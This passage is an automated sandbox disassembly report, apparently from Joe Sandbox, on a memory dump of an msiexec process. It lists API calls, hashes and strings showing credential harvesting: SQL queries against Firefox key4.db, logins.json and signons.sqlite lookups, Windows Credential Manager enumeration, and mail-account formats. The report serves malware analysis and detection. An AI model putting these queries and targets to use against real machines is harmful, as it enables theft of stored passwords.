                                                                                                    • memcmp.MSVCRT(00000000,00457934,00000006,?,?,?,?,?,?,?,?,key4.db,00000143,00000000), ref: 0040686E
                                                                                                    • memcpy.MSVCRT(?,00000023,?,?,?,?,?,?,?,?,?,?,?,?,key4.db,00000143), ref: 004068A1
                                                                                                    • memcpy.MSVCRT(?,?,00000010), ref: 004068BA
                                                                                                    • memcpy.MSVCRT(?,?,00000010), ref: 004068D3
                                                                                                    • memcmp.MSVCRT(00000000,0045793C,00000006,?,?,?,?,?,?,?,?,?,?,?,key4.db,00000143), ref: 004068EC
                                                                                                    • memcpy.MSVCRT(?,00000015,?), ref: 00406908
                                                                                                    • memcmp.MSVCRT(00000000,00456EA0,00000010,?,?,?,?,?,?,?,?,?,?,key4.db,00000143,00000000), ref: 004069B2
                                                                                                    • memcmp.MSVCRT(00000000,00457944,00000006), ref: 004069CA
                                                                                                    • memcpy.MSVCRT(?,00000023,?), ref: 00406A03
                                                                                                    • memcpy.MSVCRT(?,00000042,00000010), ref: 00406A1F
                                                                                                    • memcpy.MSVCRT(?,00000054,00000020), ref: 00406A3B
                                                                                                    • memcmp.MSVCRT(00000000,0045794C,00000006), ref: 00406A4A
                                                                                                    • memcpy.MSVCRT(?,00000015,?), ref: 00406A6E
                                                                                                    • memcpy.MSVCRT(?,0000001A,00000020), ref: 00406A86
                                                                                                    Strings
                                                                                                    • key4.db, xrefs: 00406756
                                                                                                    • SELECT a11,a102 FROM nssPrivate, xrefs: 00406933
                                                                                                    • , xrefs: 00406834
                                                                                                    • SELECT item1,item2 FROM metadata WHERE id = 'password', xrefs: 004067C4
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000010.00000002.2589379831.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 00000010.00000002.2589379831.0000000000456000.00000040.80000000.00040000.00000000.sdmp
                                                                                                    • Associated: 00000010.00000002.2589379831.000000000045C000.00000040.80000000.00040000.00000000.sdmp
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_16_2_400000_msiexec.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: memcpy$memcmp$memsetstrlen
                                                                                                    • String ID: $SELECT a11,a102 FROM nssPrivate$SELECT item1,item2 FROM metadata WHERE id = 'password'$key4.db
                                                                                                    • API String ID: 3614188050-3983245814
                                                                                                    • Opcode ID: 36044ac86a6ba26f1195c251ddbd5a0cf0b65534d70e88717d104d14f24e386f
                                                                                                    • Instruction ID: f64da88478914857a13bd548ab7de8656dcb141f17a11f318e4dfa38f1e39988
                                                                                                    • Opcode Fuzzy Hash: 36044ac86a6ba26f1195c251ddbd5a0cf0b65534d70e88717d104d14f24e386f
                                                                                                    • Instruction Fuzzy Hash: 76A1C7B1A00215ABDB14EFA5D841BDFB3A8FF44308F11453BF515E7282E778EA548B98
                                                                                                    APIs
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000010.00000002.2589379831.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 00000010.00000002.2589379831.0000000000456000.00000040.80000000.00040000.00000000.sdmp
                                                                                                    • Associated: 00000010.00000002.2589379831.000000000045C000.00000040.80000000.00040000.00000000.sdmp
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_16_2_400000_msiexec.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: sprintf$memset$_mbscpy
                                                                                                    • String ID: bgcolor="%s"$ width="%s"$</font>$<font color="%s">$<table border="1" cellpadding="5"><tr%s>$<th%s>%s%s%s
                                                                                                    • API String ID: 3402215030-3842416460
                                                                                                    • Opcode ID: ea23fa7928f637b81322df5704cb4e79e7cdaf63d3e69134c948d1ddb26e9ea3
                                                                                                    • Instruction ID: f20d4583fe87a1bfbd8f178ed5e4bb51106c12545e3cf4f5d6ab8081ed6cb500
                                                                                                    • Opcode Fuzzy Hash: ea23fa7928f637b81322df5704cb4e79e7cdaf63d3e69134c948d1ddb26e9ea3
                                                                                                    • Instruction Fuzzy Hash: 2E4152B2C0115D6AEB21EB54DC42FEA776CEF54308F0401E7B619E2152E278AB988B65
                                                                                                    APIs
                                                                                                      • Part of subcall function 00407B29: GetFileSize.KERNEL32(00000000,00000000,?,?,?,0040F0E7,?,?,?,?), ref: 00407B42
                                                                                                      • Part of subcall function 00407B29: CloseHandle.KERNEL32(00000000,?,?,?), ref: 00407B6E
                                                                                                      • Part of subcall function 004080D4: free.MSVCRT ref: 004080DB
                                                                                                      • Part of subcall function 00407035: _mbscpy.MSVCRT(?,?,0040F113,?,?,?,?,?), ref: 0040703A
                                                                                                      • Part of subcall function 00407035: strrchr.MSVCRT ref: 00407042
                                                                                                      • Part of subcall function 0040DAC2: memset.MSVCRT ref: 0040DAE3
                                                                                                      • Part of subcall function 0040DAC2: memset.MSVCRT ref: 0040DAF7
                                                                                                      • Part of subcall function 0040DAC2: memset.MSVCRT ref: 0040DB0B
                                                                                                      • Part of subcall function 0040DAC2: memcpy.MSVCRT(?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 0040DBD8
                                                                                                      • Part of subcall function 0040DAC2: memcpy.MSVCRT(?,?,00000000,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 0040DC38
                                                                                                      • Part of subcall function 0040F036: _mbsicmp.MSVCRT ref: 0040F07F
                                                                                                    • strlen.MSVCRT ref: 0040F139
                                                                                                    • strlen.MSVCRT ref: 0040F147
                                                                                                    • memset.MSVCRT ref: 0040F187
                                                                                                    • strlen.MSVCRT ref: 0040F196
                                                                                                    • strlen.MSVCRT ref: 0040F1A4
                                                                                                    • memset.MSVCRT ref: 0040F1EA
                                                                                                    • strlen.MSVCRT ref: 0040F1F9
                                                                                                    • strlen.MSVCRT ref: 0040F207
                                                                                                    • _strcmpi.MSVCRT ref: 0040F2B2
                                                                                                    • _mbscpy.MSVCRT(00000004,00000204,?,?,?,?,?,?), ref: 0040F2CD
                                                                                                    • _mbscpy.MSVCRT(00000004,00000204,?,?,?,?,?,?), ref: 0040F30E
                                                                                                      • Part of subcall function 004070E3: _mbscpy.MSVCRT(00000000,00000000,sqlite3.dll,00402116,00000000,nss3.dll), ref: 004070EB
                                                                                                      • Part of subcall function 004070E3: _mbscat.MSVCRT ref: 004070FA
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000010.00000002.2589379831.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 00000010.00000002.2589379831.0000000000456000.00000040.80000000.00040000.00000000.sdmp
                                                                                                    • Associated: 00000010.00000002.2589379831.000000000045C000.00000040.80000000.00040000.00000000.sdmp
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_16_2_400000_msiexec.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: strlen$memset$_mbscpy$memcpy$CloseFileHandleSize_mbscat_mbsicmp_strcmpifreestrrchr
                                                                                                    • String ID: logins.json$none$signons.sqlite$signons.txt
                                                                                                    • API String ID: 2003275452-3138536805
                                                                                                    • Opcode ID: 902799fa4b1ae56d660fb5b5f253a280b97e2ca6f8806fc11f1a2088d22d41ab
                                                                                                    • Instruction ID: 4390ea688f3eb6ff8deec26b973fceccf030c6f24aada76a9830730871e88cce
                                                                                                    • Opcode Fuzzy Hash: 902799fa4b1ae56d660fb5b5f253a280b97e2ca6f8806fc11f1a2088d22d41ab
                                                                                                    • Instruction Fuzzy Hash: 5261F671504605AED724EB70CC81BDAB3E8AF14314F1405BFE599E30C1EB78BA89CB99
                                                                                                    APIs
                                                                                                    • memset.MSVCRT ref: 0040C3F7
                                                                                                    • GetModuleFileNameA.KERNEL32(00000000,00000000,00000104,?,00000000,00000000), ref: 0040C408
                                                                                                    • strrchr.MSVCRT ref: 0040C417
                                                                                                    • _mbscat.MSVCRT ref: 0040C431
                                                                                                    • _mbscpy.MSVCRT(?,00000000,00000000,.cfg), ref: 0040C465
                                                                                                    • _mbscpy.MSVCRT(00000000,General,?,00000000,00000000,.cfg), ref: 0040C476
                                                                                                    • GetWindowPlacement.USER32(?,?), ref: 0040C50C
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000010.00000002.2589379831.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 00000010.00000002.2589379831.0000000000456000.00000040.80000000.00040000.00000000.sdmp
                                                                                                    • Associated: 00000010.00000002.2589379831.000000000045C000.00000040.80000000.00040000.00000000.sdmp
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_16_2_400000_msiexec.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: _mbscpy$FileModuleNamePlacementWindow_mbscatmemsetstrrchr
                                                                                                    • String ID: .cfg$AddExportHeaderLine$General$MarkOddEvenRows$SaveFilterIndex$ShowGridLines$WinPos
                                                                                                    • API String ID: 1012775001-1343505058
                                                                                                    • Opcode ID: 9e23aae614ac24114fc18125b019b65eb6573faab22d4a721f00cae62469f9bb
                                                                                                    • Instruction ID: 781a2e52d7f362fd39b5c74be6276a003a473a920a8a4abf0813dd90f66971c0
                                                                                                    • Opcode Fuzzy Hash: 9e23aae614ac24114fc18125b019b65eb6573faab22d4a721f00cae62469f9bb
                                                                                                    • Instruction Fuzzy Hash: F2417E72A01128AFEB21DB54CC85FDAB7BCEB4A300F5440EAF54DA7151DA34AA84CF65
                                                                                                    APIs
                                                                                                    • memset.MSVCRT ref: 00444612
                                                                                                      • Part of subcall function 00444462: strlen.MSVCRT ref: 0044446F
                                                                                                    • strlen.MSVCRT ref: 0044462E
                                                                                                    • memset.MSVCRT ref: 00444668
                                                                                                    • memset.MSVCRT ref: 0044467C
                                                                                                    • memset.MSVCRT ref: 00444690
                                                                                                    • memset.MSVCRT ref: 004446B6
                                                                                                      • Part of subcall function 0040D205: memcpy.MSVCRT(?,00000000,00000008,00000000,0000041E,00000000,?,00444A02,?,?,?,00000008,?,00000000,00000000), ref: 0040D296
                                                                                                      • Part of subcall function 0040D2A3: memset.MSVCRT ref: 0040D2C2
                                                                                                      • Part of subcall function 0040D2A3: memset.MSVCRT ref: 0040D2D8
                                                                                                      • Part of subcall function 0040D2A3: memcpy.MSVCRT(?,?,00000010,?,00000000,00000000,?,?,?,?,?,?,00000000,0040381A,00000000), ref: 0040D30F
                                                                                                      • Part of subcall function 0040D2A3: memset.MSVCRT ref: 0040D319
                                                                                                    • memcpy.MSVCRT(?,00000000,00000008,?,?,?,00000000,000003FF,?,00000000,0000041E,?,00000000,0000041E,?,00000000), ref: 004446ED
                                                                                                      • Part of subcall function 0040D205: memcpy.MSVCRT(?,00000000,00000040,00000000,0000041E,00000000,?,00444A02,?,?,?,00000008,?,00000000,00000000), ref: 0040D248
                                                                                                      • Part of subcall function 0040D205: memcpy.MSVCRT(?,00000000,00000040,00000000,0000041E,00000000,?,00444A02,?,?,?,00000008,?,00000000,00000000), ref: 0040D272
                                                                                                      • Part of subcall function 0040D2A3: memset.MSVCRT ref: 0040D2EA
                                                                                                    • memcpy.MSVCRT(?,?,00000010,?,?), ref: 00444729
                                                                                                    • memcpy.MSVCRT(?,?,00000008,?,?,00000010,?,?), ref: 0044473B
                                                                                                    • _mbscpy.MSVCRT(?,?), ref: 00444812
                                                                                                    • memcpy.MSVCRT(?,?,00000004,?,?,?,?), ref: 00444843
                                                                                                    • memcpy.MSVCRT(?,?,00000004,?,?,00000004,?,?,?,?), ref: 00444855
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000010.00000002.2589379831.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 00000010.00000002.2589379831.0000000000456000.00000040.80000000.00040000.00000000.sdmp
                                                                                                    • Associated: 00000010.00000002.2589379831.000000000045C000.00000040.80000000.00040000.00000000.sdmp
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_16_2_400000_msiexec.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: memcpymemset$strlen$_mbscpy
                                                                                                    • String ID: salu
                                                                                                    • API String ID: 3691931180-4177317985
                                                                                                    • Opcode ID: b7cf63fef92e37f4bb0d3b69adaea4b1cc931356000d291c0cdd30d7a2f6e4ad
                                                                                                    • Instruction ID: b87b4f34a2d3e3c1159852785770864cc269bb22f3616182f1b5584d27518a2a
                                                                                                    • Opcode Fuzzy Hash: b7cf63fef92e37f4bb0d3b69adaea4b1cc931356000d291c0cdd30d7a2f6e4ad
                                                                                                    • Instruction Fuzzy Hash: 65713D7190015DAADB10EBA5CC81ADEB7B8FF44348F1444BAF648E7141DB38AB498F95
                                                                                                    APIs
                                                                                                    • LoadLibraryA.KERNEL32(psapi.dll,?,0040FE19), ref: 00410047
                                                                                                    • GetProcAddress.KERNEL32(00000000,GetModuleBaseNameA), ref: 00410060
                                                                                                    • GetProcAddress.KERNEL32(00000000,EnumProcessModules), ref: 00410071
                                                                                                    • GetProcAddress.KERNEL32(00000000,GetModuleFileNameExA), ref: 00410082
                                                                                                    • GetProcAddress.KERNEL32(00000000,EnumProcesses), ref: 00410093
                                                                                                    • GetProcAddress.KERNEL32(00000000,GetModuleInformation), ref: 004100A4
                                                                                                    • FreeLibrary.KERNEL32(00000000), ref: 004100C4
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000010.00000002.2589379831.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 00000010.00000002.2589379831.0000000000456000.00000040.80000000.00040000.00000000.sdmp
                                                                                                    • Associated: 00000010.00000002.2589379831.000000000045C000.00000040.80000000.00040000.00000000.sdmp
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_16_2_400000_msiexec.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: AddressProc$Library$FreeLoad
                                                                                                    • String ID: EnumProcessModules$EnumProcesses$GetModuleBaseNameA$GetModuleFileNameExA$GetModuleInformation$psapi.dll
                                                                                                    • API String ID: 2449869053-232097475
                                                                                                    • Opcode ID: ea82c00efb8b675967e90ca7ea1b3b2de08eeb41589313c02842f66110c29472
                                                                                                    • Instruction ID: dd2e46225b8bbf3860c07ad768741e6abff990e6b314fd3472572f6830733abf
                                                                                                    • Opcode Fuzzy Hash: ea82c00efb8b675967e90ca7ea1b3b2de08eeb41589313c02842f66110c29472
                                                                                                    • Instruction Fuzzy Hash: 6E0144399017426AE7226B29BC51B6B3EB89B4DB01B15007BE400E2352DBFCD8C0CF5E
                                                                                                    APIs
                                                                                                    • sprintf.MSVCRT ref: 0040957B
                                                                                                    • LoadMenuA.USER32(?,?), ref: 00409589
                                                                                                      • Part of subcall function 004093B2: GetMenuItemCount.USER32(?), ref: 004093C7
                                                                                                      • Part of subcall function 004093B2: memset.MSVCRT ref: 004093E8
                                                                                                      • Part of subcall function 004093B2: GetMenuItemInfoA.USER32 ref: 00409423
                                                                                                      • Part of subcall function 004093B2: strchr.MSVCRT ref: 0040943A
                                                                                                    • DestroyMenu.USER32(00000000), ref: 004095A7
                                                                                                    • sprintf.MSVCRT ref: 004095EB
                                                                                                    • CreateDialogParamA.USER32(?,00000000,00000000,00409555,00000000), ref: 00409600
                                                                                                    • memset.MSVCRT ref: 0040961C
                                                                                                    • GetWindowTextA.USER32(00000000,?,00001000), ref: 0040962D
                                                                                                    • EnumChildWindows.USER32(00000000,Function_000094A2,00000000), ref: 00409655
                                                                                                    • DestroyWindow.USER32(00000000), ref: 0040965C
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000010.00000002.2589379831.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 00000010.00000002.2589379831.0000000000456000.00000040.80000000.00040000.00000000.sdmp
                                                                                                    • Associated: 00000010.00000002.2589379831.000000000045C000.00000040.80000000.00040000.00000000.sdmp
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_16_2_400000_msiexec.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: Menu$DestroyItemWindowmemsetsprintf$ChildCountCreateDialogEnumInfoLoadParamTextWindowsstrchr
                                                                                                    • String ID: caption$dialog_%d$menu_%d
                                                                                                    • API String ID: 3259144588-3822380221
                                                                                                    • Opcode ID: 28b324c1556d4b5440d18e0b4d206da1123046d85e66521c8e04ac1cff3212ab
                                                                                                    • Instruction ID: e9c2f3b5cfdd7c6c8f350bf48a14ef17ef5fca4d90bdc7cc97d58e5e48f5f72a
                                                                                                    • Opcode Fuzzy Hash: 28b324c1556d4b5440d18e0b4d206da1123046d85e66521c8e04ac1cff3212ab
                                                                                                    • Instruction Fuzzy Hash: 5C212672901288BFDB129F509C81EAF3768FB09305F044076FA01A1192E7B99D548B6E
                                                                                                    APIs
                                                                                                      • Part of subcall function 00404656: FreeLibrary.KERNEL32(?,004045E3,?,0040F708,?,00000000), ref: 0040465D
                                                                                                    • LoadLibraryA.KERNEL32(advapi32.dll,?,0040F708,?,00000000), ref: 004045E8
                                                                                                    • GetProcAddress.KERNEL32(00000000,CredReadA), ref: 00404601
                                                                                                    • GetProcAddress.KERNEL32(?,CredFree), ref: 0040460D
                                                                                                    • GetProcAddress.KERNEL32(?,CredDeleteA), ref: 00404619
                                                                                                    • GetProcAddress.KERNEL32(?,CredEnumerateA), ref: 00404625
                                                                                                    • GetProcAddress.KERNEL32(?,CredEnumerateW), ref: 00404631
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000010.00000002.2589379831.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 00000010.00000002.2589379831.0000000000456000.00000040.80000000.00040000.00000000.sdmp
                                                                                                    • Associated: 00000010.00000002.2589379831.000000000045C000.00000040.80000000.00040000.00000000.sdmp
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_16_2_400000_msiexec.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: AddressProc$Library$FreeLoad
                                                                                                    • String ID: CredDeleteA$CredEnumerateA$CredEnumerateW$CredFree$CredReadA$advapi32.dll
                                                                                                    • API String ID: 2449869053-4258758744
                                                                                                    • Opcode ID: 95c828cc82fe4028a070e770a6f28d73b450c6aa5ffca84da52b55bfa0e2fca7
                                                                                                    • Instruction ID: 2cc24b9197253aa622afa6144fd2e07652f81762edb29d5cb7a2b3ace442d85c
                                                                                                    • Opcode Fuzzy Hash: 95c828cc82fe4028a070e770a6f28d73b450c6aa5ffca84da52b55bfa0e2fca7
                                                                                                    • Instruction Fuzzy Hash: 12014FB49017009ADB30AF75C809B46BBE0EFA9704F214C2FE295A3691E77ED445CF88
                                                                                                    APIs
                                                                                                    • wcsstr.MSVCRT ref: 0040426A
                                                                                                    • WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,?,0000007F,00000000,00000000), ref: 004042B1
                                                                                                    • WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,?,0000007F,00000000,00000000), ref: 004042C5
                                                                                                    • _mbscpy.MSVCRT(?,?), ref: 004042D5
                                                                                                    • _mbscpy.MSVCRT(?,?,?,?), ref: 004042E8
                                                                                                    • strchr.MSVCRT ref: 004042F6
                                                                                                    • strlen.MSVCRT ref: 0040430A
                                                                                                    • sprintf.MSVCRT ref: 0040432B
                                                                                                    • strchr.MSVCRT ref: 0040433C
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000010.00000002.2589379831.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 00000010.00000002.2589379831.0000000000456000.00000040.80000000.00040000.00000000.sdmp
                                                                                                    • Associated: 00000010.00000002.2589379831.000000000045C000.00000040.80000000.00040000.00000000.sdmp
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_16_2_400000_msiexec.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: ByteCharMultiWide_mbscpystrchr$sprintfstrlenwcsstr
                                                                                                    • String ID: %s@gmail.com$www.google.com
                                                                                                    • API String ID: 3866421160-4070641962
                                                                                                    • Opcode ID: 1edbde93058757da684035df5ff447e14cead6821ca445e74965780bbbdd419f
                                                                                                    • Instruction ID: 1d125d0bf78842d5973e64574db62130ec83037e0b154f7c504db0db8660d96c
                                                                                                    • Opcode Fuzzy Hash: 1edbde93058757da684035df5ff447e14cead6821ca445e74965780bbbdd419f
                                                                                                    • Instruction Fuzzy Hash: DA3186B290025DAFEB11DBA1DC81FDAB3BCEB45714F1405A7B718E3180DA38EF448A58
                                                                                                    APIs
                                                                                                    • _mbscpy.MSVCRT(0045A448,00000000,00000000,00000000,?,?,00409862,00000000,?,00000000,00000104,?), ref: 00409749
                                                                                                    • _mbscpy.MSVCRT(0045A550,general,0045A448,00000000,00000000,00000000,?,?,00409862,00000000,?,00000000,00000104,?), ref: 00409759
                                                                                                      • Part of subcall function 0040930C: memset.MSVCRT ref: 00409331
                                                                                                      • Part of subcall function 0040930C: GetPrivateProfileStringA.KERNEL32(0045A550,00000104,0044C52F,?,00001000,0045A448), ref: 00409355
                                                                                                      • Part of subcall function 0040930C: WritePrivateProfileStringA.KERNEL32(0045A550,?,?,0045A448), ref: 0040936C
                                                                                                    • EnumResourceNamesA.KERNEL32(00000104,00000004,0040955A,00000000), ref: 0040978F
                                                                                                    • EnumResourceNamesA.KERNEL32(00000104,00000005,0040955A,00000000), ref: 00409799
                                                                                                    • _mbscpy.MSVCRT(0045A550,strings,?,00409862,00000000,?,00000000,00000104,?), ref: 004097A1
                                                                                                    • memset.MSVCRT ref: 004097BD
                                                                                                    • LoadStringA.USER32(00000104,00000000,?,00001000), ref: 004097D1
                                                                                                      • Part of subcall function 0040937A: _itoa.MSVCRT ref: 0040939B
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000010.00000002.2589379831.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 00000010.00000002.2589379831.0000000000456000.00000040.80000000.00040000.00000000.sdmp
                                                                                                    • Associated: 00000010.00000002.2589379831.000000000045C000.00000040.80000000.00040000.00000000.sdmp
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_16_2_400000_msiexec.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: String_mbscpy$EnumNamesPrivateProfileResourcememset$LoadWrite_itoa
                                                                                                    • String ID: TranslatorName$TranslatorURL$general$strings
                                                                                                    • API String ID: 1035899707-3647959541
                                                                                                    • Opcode ID: a0ec869b2dd78c9688f5c4aeae5101ac8de8338f716e64c62a8758e97b5b0f37
                                                                                                    • Instruction ID: 9d87356d66cebc64c7ffc1a8588b7925a858c7ffbf95e02bf5fcf8d8eff5f455
                                                                                                    • Opcode Fuzzy Hash: a0ec869b2dd78c9688f5c4aeae5101ac8de8338f716e64c62a8758e97b5b0f37
                                                                                                    • Instruction Fuzzy Hash: F711C87290016475F7312B569C46F9B3F5CDBCAB55F10007BBB08A71C3D6B89D408AAD
                                                                                                    APIs
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000010.00000002.2589379831.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 00000010.00000002.2589379831.0000000000456000.00000040.80000000.00040000.00000000.sdmp
                                                                                                    • Associated: 00000010.00000002.2589379831.000000000045C000.00000040.80000000.00040000.00000000.sdmp
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_16_2_400000_msiexec.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: _strcmpi_strnicmpmemsetsprintf$strlen
                                                                                                    • String ID: imap://$imap://%s@%s$mailbox://$mailbox://%s@%s
                                                                                                    • API String ID: 2360744853-2229823034
                                                                                                    • Opcode ID: b98e279298427c20d80c092d066d5e90b39ad4a4c54a31d4adca6ea1b8d7f224
                                                                                                    • Instruction ID: 1258fd73e7f0479363a75d8e9bd03f7624e4807d7768342ee5bbbb65847b95d7
                                                                                                    • Opcode Fuzzy Hash: b98e279298427c20d80c092d066d5e90b39ad4a4c54a31d4adca6ea1b8d7f224
                                                                                                    • Instruction Fuzzy Hash: 95418272604605AFE720DAA6CC81F96B3F8EB04314F14497BF95AE7281D738F9548B58
                                                                                                    APIs
                                                                                                    • strchr.MSVCRT ref: 004100E4
                                                                                                    • _mbscpy.MSVCRT(?,-00000001), ref: 004100F2
                                                                                                      • Part of subcall function 0040783C: strlen.MSVCRT ref: 0040784E
                                                                                                      • Part of subcall function 0040783C: strlen.MSVCRT ref: 00407856
                                                                                                      • Part of subcall function 0040783C: _memicmp.MSVCRT ref: 00407874
                                                                                                    • _mbscpy.MSVCRT(?,00000000,00000000,?,00000000,00000104,00000104), ref: 00410142
                                                                                                    • _mbscat.MSVCRT ref: 0041014D
                                                                                                    • memset.MSVCRT ref: 00410129
                                                                                                      • Part of subcall function 0040715B: GetWindowsDirectoryA.KERNEL32(0045AA00,00000104,?,00410182,00000000,?,00000000,00000104,00000104), ref: 00407170
                                                                                                      • Part of subcall function 0040715B: _mbscpy.MSVCRT(00000000,0045AA00,?,00410182,00000000,?,00000000,00000104,00000104), ref: 00407180
                                                                                                    • memset.MSVCRT ref: 00410171
                                                                                                    • memcpy.MSVCRT(?,00000000,00000002,00000000,?,00000000,00000104,00000104), ref: 0041018C
                                                                                                    • _mbscat.MSVCRT ref: 00410197
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000010.00000002.2589379831.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 00000010.00000002.2589379831.0000000000456000.00000040.80000000.00040000.00000000.sdmp
                                                                                                    • Associated: 00000010.00000002.2589379831.000000000045C000.00000040.80000000.00040000.00000000.sdmp
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_16_2_400000_msiexec.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: _mbscpy$_mbscatmemsetstrlen$DirectoryWindows_memicmpmemcpystrchr
                                                                                                    • String ID: \systemroot
                                                                                                    • API String ID: 912701516-1821301763
                                                                                                    • Opcode ID: 6597b15a16a773eef37e6b590fdc8d99fee9a87505121146da4ae3bca3d5ad9a
                                                                                                    • Instruction ID: fda7f57b1b0f7358cef9bf297f3eeb801234e423e358f1bd4862c9dba8460d26
                                                                                                    • Opcode Fuzzy Hash: 6597b15a16a773eef37e6b590fdc8d99fee9a87505121146da4ae3bca3d5ad9a
                                                                                                    • Instruction Fuzzy Hash: 3721AA7590C28479F724E2618C83FEA679CDB55704F50405FB2C9A51C1EAECF9C5862A
                                                                                                    APIs
                                                                                                      • Part of subcall function 00412F93: strlen.MSVCRT ref: 00412FA1
                                                                                                    • memcpy.MSVCRT(00000000,00000000,00000000,00000000,00000000,004067AF,?,0041D945,00000000), ref: 0041983C
                                                                                                    • memcpy.MSVCRT(?,00000000,00000000,00000000,00000000,004067AF,?,0041D945,00000000), ref: 0041985B
                                                                                                    • memcpy.MSVCRT(?,00000000,00000000,00000000,00000000,004067AF,?,0041D945,00000000), ref: 0041986D
                                                                                                    • memcpy.MSVCRT(?,-journal,0000000A,?,?,?,00000000,00000000,004067AF,?,0041D945,00000000), ref: 00419885
                                                                                                    • memcpy.MSVCRT(?,00000000,00000000,?,?,?,?,?,?,00000000,00000000,004067AF,?,0041D945,00000000), ref: 004198A2
                                                                                                    • memcpy.MSVCRT(?,-wal,00000005,?,?,?,?,?,?,?,?,?,00000000,00000000,004067AF), ref: 004198BA
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000010.00000002.2589379831.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 00000010.00000002.2589379831.0000000000456000.00000040.80000000.00040000.00000000.sdmp
                                                                                                    • Associated: 00000010.00000002.2589379831.000000000045C000.00000040.80000000.00040000.00000000.sdmp
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_16_2_400000_msiexec.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: memcpy$strlen
                                                                                                    • String ID: -journal$-wal$immutable$nolock
                                                                                                    • API String ID: 2619041689-3408036318
                                                                                                    • Opcode ID: 4aa253e10d8a34062e03d838a13a14f4a10eae4ea059de94ba2ca72b62420cd1
                                                                                                    • Instruction ID: 25f2131b2e7268d2841c48c11c9a86e68458d3caa4be6fdea11427aceae17f40
                                                                                                    • Opcode Fuzzy Hash: 4aa253e10d8a34062e03d838a13a14f4a10eae4ea059de94ba2ca72b62420cd1
                                                                                                    • Instruction Fuzzy Hash: 9FC1D1B1A04606EFDB14DFA5C841BDEFBB0BF45314F14815EE528A7381D778AA90CB98
                                                                                                    APIs
                                                                                                      • Part of subcall function 004045DB: LoadLibraryA.KERNEL32(advapi32.dll,?,0040F708,?,00000000), ref: 004045E8
                                                                                                      • Part of subcall function 004045DB: GetProcAddress.KERNEL32(00000000,CredReadA), ref: 00404601
                                                                                                      • Part of subcall function 004045DB: GetProcAddress.KERNEL32(?,CredFree), ref: 0040460D
                                                                                                      • Part of subcall function 004045DB: GetProcAddress.KERNEL32(?,CredDeleteA), ref: 00404619
                                                                                                      • Part of subcall function 004045DB: GetProcAddress.KERNEL32(?,CredEnumerateA), ref: 00404625
